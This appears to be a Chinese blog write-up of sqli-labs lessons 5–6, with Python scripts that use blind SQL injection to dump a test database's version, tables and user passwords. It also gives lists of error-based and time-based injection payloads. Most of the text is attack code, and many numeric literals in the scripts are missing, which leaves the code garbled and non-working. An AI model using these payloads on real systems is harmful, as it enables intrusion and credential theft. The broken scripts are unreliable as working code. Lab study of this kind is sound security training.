思考1:当# --+都被过滤时,只能考虑闭合处理

思考2:union联合注入时必须先判断字段长度

eg. id=1' order by 3 and '1'='1

sqli5:

首先判断出对id经过了'处理

其次发现结果不再回显

ok那就盲注了,先判断mysql版本,版本过低可优先考虑dns边信道攻击。

bool盲注(and逻辑)的脚本(substr)

 # -*- coding: utf- -*-

 """

 Created on Sat Mar  :: 

 @author: kenshin

 """

 import requests,re

 url = 'http://localhost/sqli-labs/Less-5/?id=1'

 pattern_mark = 'You are in...........'

 def get_version(url):

     #mysql版本标准:x.x.xx

     #假设lstsion长度为5

     lst = ['#' for x in range(, )]

     lst[] = lst[] = '.'

     for i in (,,,):

         for ii in range(,):

             payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"

             url_new = url + payload

             r = requests.get(url_new)

             if(re.findall(pattern_mark,r.text)):

                 lst[i-] = str(ii-)

                 break

     sr = ''.join(lst)

     print("the lstsion of mysql:"+sr)

 def get_user(url):

     #假设user()长度为15

     lst = ['#' for x in range(,)]

     for i in range(,):

         for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':

             payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+"

             url_new = url + payload

             r = requests.get(url_new)

             if(re.findall(pattern_mark,r.text)):

                 lst[i-] = ii

                 print(ii)

                 break

     sr = ''.join(lst)

     print("the user of database: "+sr)

 def get_datadir(url):

     #假设@@datadir长度为32

     lst = ['#' for x in range(,)]

     for i in range(,):

         for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':

             payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+"

             url_new = url + payload

             r = requests.get(url_new)

             if(re.findall(pattern_mark,r.text)):

                 lst[i-] = ii

                 print(ii)

                 break

     sr = ''.join(lst)

     print(sr)

 def get_currTB(url):

     #假设当前数据库最多有10个表[i标识]

     for i in range(,):

         #假设最长的表名长度为10[ii标识]

         lst = ['#' for x in range(,)]

         for ii in range(,):

             for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':

                 payload = "\' and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"

                 url_new = url + payload

                 r = requests.get(url_new)

                 if(re.findall(pattern_mark,r.text)):

                     lst[ii-] = iii

                     print(iii)

                     break

             if(lst[ii-] == '#'):

                break

         sr = ''.join(lst)

         print(sr)

 def get_Column(url,tb):

     #假设当前列最多有3个字段[i标识]

     for i in range(,):

         #假设每个字段最长的数据长度为10

         lst = ['#' for x in range(,)]

         for ii in range(,):

             for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':

                 payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"

                 url_new = url + payload

                 r = requests.get(url_new)

                 if(re.findall(pattern_mark,r.text)):

                     lst[ii-] = iii

                     print(iii)

                     break

             if(lst[ii-] == '#'):

                break

         sr = ''.join(lst)

         print(sr)

 def get_data(url):

     #假设当前列有10条数据[i标识]

     for i in range(,):

         #假设每条数据最长的数据长度为25

         lst = ['#' for x in range(,)]

         for ii in range(,):

             for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':

             #变量太多,payload一些变量在代码端自行设置TT

                 payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+"

                 url_new = url + payload

                 r = requests.get(url_new)

                 if(re.findall(pattern_mark,r.text)):

                     lst[ii-] = iii

                     print(iii)

                     break

             if(lst[ii-] == '#'):

                break

         sr = ''.join(lst)

         print(sr)

 """

 dnslog

 """

 #get_lstsion(url)

 #get_user(url)

 #get_datadir(url)

 #get_currTB(url)

 #tb = input("select table >> ")

 #get_Column(url,tb)

 get_data(url)

v1 bool型盲注脚本

# -*- coding: utf- -*-

"""

Created on Sat Mar  :: 

@author: kenshin

"""

import requests,re,time,sys

url = 'http://localhost/sqli-labs/Less-5/?id=1'

pattern_mark = 'You are in...........'

def view_bar(num,total):

    rate = num / total

    rate_num = int(rate * )

    r = '\r[%d%%]%s>' % (rate_num,'='*num)

    sys.stdout.write(r)

    sys.stdout.flush()

def get_version(url):

    #mysql版本标准:x.x.xx

    #假设lstsion长度为5

    lst = ['#' for x in range(, )]

    lst[] = lst[] = '.'

    for i in (,,,):

        view_bar(i,)

        for ii in range(,):

            payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"

            url_new = url + payload

            r = requests.get(url_new)

            if(re.findall(pattern_mark,r.text)):

                lst[i-] = str(ii-)

                break

    sr = ''.join(lst)

    print("\nthe version of mysql:"+sr)

def get_user(url):

    #假设user()长度为15

    lst = ['#' for x in range(,)]

    for i in range(,):

        view_bar(i,)

        for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':

            payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+"

            url_new = url + payload

            r = requests.get(url_new)

            if(re.findall(pattern_mark,r.text)):

                lst[i-] = ii

                break

    sr = ''.join(lst)

    print("\n the user of database: "+sr)

def get_datadir(url):

    #假设@@datadir长度为32

    lst = ['#' for x in range(,)]

    for i in range(,):

        view_bar(i,)

        for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':

            payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+"

            url_new = url + payload

            r = requests.get(url_new)

            if(re.findall(pattern_mark,r.text)):

                lst[i-] = ii

                break

    sr = ''.join(lst)

    print(sr)

    time_end=time.time()

    print("\ntotally cost: "+str(time_end-time_start) + "s")

def get_currTB(url):

    #假设当前数据库最多有10个表[i标识]

    for i in range(,):

        view_bar(i,)

        #假设最长的表名长度为10[ii标识]

        lst = ['#' for x in range(,)]

        for ii in range(,):

            for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':

                payload = "\' and substr((select table_name from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"

                url_new = url + payload

                r = requests.get(url_new)

                if(re.findall(pattern_mark,r.text)):

                    lst[ii-] = iii

                    break

            if(lst[ii-] == '#'):

               break

        sr = ''.join(lst)

        print("\n"+sr)

def get_Column(url,tb):

    #假设当前列最多有3个字段[i标识]

    for i in range(,):

        view_bar(i,)

        #假设每个字段最长的数据长度为10

        lst = ['#' for x in range(,)]

        for ii in range(,):

            for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':

                payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"

                url_new = url + payload

                r = requests.get(url_new)

                if(re.findall(pattern_mark,r.text)):

                    lst[ii-] = iii

                    break

            if(lst[ii-] == '#'):

               break

        sr = ''.join(lst)

        print("\n"+sr)

def get_data(url):

    time_start=time.time()

    #假设当前列有10条数据[i标识]

    for i in range(,):

        view_bar(i,)

        #假设每条数据最长的数据长度为25

        lst = ['#' for x in range(,)]

        for ii in range(,):

            for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':

            #变量太多,payload一些变量在代码端自行设置TT

                payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+"

                url_new = url + payload

                r = requests.get(url_new)

                if(re.findall(pattern_mark,r.text)):

                    lst[ii-] = iii

                    break

            if(lst[ii-] == '#'):

               break

        sr = ''.join(lst)

        print("\n"+sr)

    time_end=time.time()

    print("totally cost: "+str(time_end-time_start) + "s")

"""

dnslog

"""

#get_version(url)

#get_user(url)

#get_datadir(url)

#get_currTB(url)

#tb = input("select table >> ")

#get_Column(url,tb)

#get_data(url)

v2 增加了进度条

环境均为mysql 5.5.3

(left)

' and left(version(),1)=--+(php5.2版本可用,瞎报)
' and left(database(),)=>'a'--+(php5+版本可用

(substr)

' and substr((select database() limit 0,1),1,1)>'z'--+(php5+版本可用)

(regexp)

' and 1=(select  from information_schema.columns where table_name='users' and column_name regexp '^username')--+(php5+版本可用)

(mid)

' and mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)='d'--+(php5+版本可用)

补充:ascill和ord()可将字符转换为ascill码

sqli-6

对id经过了"处理

floor(rand(0)*2)报错(php 5+版本可用)

-1' union Select 1,count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+ 
    =>root@localhost
database()
@@datadir
...
-1' union select 1,count(*),concat(0x7e,(select schema_name from information_schema.schemata limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
    =>security
-1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
    =>users
-1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
    =>password
-1' union select 1,count(*),concat(0x7e,(select password from security.users limit 0,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
    =>Dump

 # -*- coding: utf- -*-

 """

 Created on Sun Mar  :: 

 @author: kenshin

 """

 import requests,re

 url = 'http://localhost/sqli-labs/Less-5/?id=-1'

 pattern_mark = '~(.+?)~'

 def get_currDB(url):

     payload = "\' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+"

     url += payload

     r = requests.get(url)

     rst=re.findall(pattern_mark,r.text)

     print(rst)

 get_currDB(url)

脚本

xpath函数报错

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
    =>5.5.53

利用数据的重复性

-' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+

...

updatexml

' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+

sleep延时注入

' and If(substr(database(),1,1)='s',1,sleep(5))--+

BENCHMARK延时注入

1' UNION SELECT (IF(SUBSTRING(current,1,1)='s',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+

sqli-labs:5-6,盲注的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. sql盲注之报错注入(附自动化脚本)

    作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲 ...

  4. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  5. 【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

    加and http://localhost/sqli/Less-9/?id=1' and '1'='1%23 http://localhost/sqli/Less-9/?id=1' and '1'=' ...

  6. 【sqli-labs】 less8 GET - Blind - Boolian Based - Single Quotes (基于布尔的单引号GET盲注)

    加单引号 没有任何信息输出 加and 页面变化,不正常是没有任何回显 http://localhost/sqli/Less-8/?id=1' and '1'='1 http://localhost/s ...

  7. 2019-9-9:渗透测试,基础学习,pydictor使用,sql盲注,docker使用,笔记

    pydictor,强大的密码生成工具,可以合并密码字典,词频统计,去重,枚举数字字典生成字典python3 pydictor.py -base d --len 4 4 生成纯数字4位密码python3 ...

  8. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  9. Natas15 Writeup(sql盲注之布尔盲注)

    Natas15: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  10. sql布尔盲注和时间盲注的二分脚本

    布尔盲注: import requests url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/" ...

随机推荐

  1. linux下安装zabbix服务器

    1.lnmp环境安装(linux.nginx.mysql.php) 2.安装php所需模块以及其他模块 yum install -y php-bcmath yum install -y php-mbs ...

  2. Python 豆瓣日记爬取

    无聊写了个豆瓣日记的小爬虫,requests+bs4. cookies_src可填可不填,主要是为了爬取仅自己可见的日记. url填写的是日记页面,即https://www.douban.com/pe ...

  3. cf-Global Round2-D. Frets On Fire(二分)

    题目链接:http://codeforces.com/contest/1119/problem/D 题意:给n(<=1e5)个数s[i],i=1..n,(0<=s[i]<=1e18) ...

  4. checkbox/radio 样式修改

    只改颜色 input[type=radio],input[type=checkbox] { display: inline-block; vertical-align: middle; width: ...

  5. JS获取鼠标左(右)滑事件

    鼠标左(右)滑也是网站开发中常见的效果之一,这里对鼠标左(右)滑做出一些解释. 首先要获取需要左右滑事件的节点: eg: var div=document.getElementById("d ...

  6. GIRDVIEW 控件绑定数据后 后台c#控制隐藏某列

    gv_EnterpriseInfo.DataSource = pageResult.Data; gv_EnterpriseInfo.DataBind(); 之后加判断条件: if (true) { g ...

  7. windows phpstudy如何扩展MongoDB

    phpstudy如何扩展MongoDB 作者: default|标签:phpstudy MongoDB PHP|2017-9-9 10:17 phpstudy扩展MongoDB 前置工作安装PHPst ...

  8. [剑指Offer]快排

    快排 看到一篇博文提到"东拆西补"的思想,非常贴切了. 这里采用传统的方法,没有采用剑指Offer书上的方法. 细节很多,需巩固. 其他知识点 生成一个范围内随机数 见代码,这里为 ...

  9. IIS挂起网站配置文件地址

    “C/用户/Administrator/我的文档/IISExpress/Config/applicationhost”

  10. Spring事务<tx:annotation-driven/>的理解

    在使用Spring的时候,配置文件中我们经常看到 annotation-driven 这样的注解,其含义就是支持注解,一般根据前缀 tx.mvc 等也能很直白的理解出来分别的作用. <tx:an ...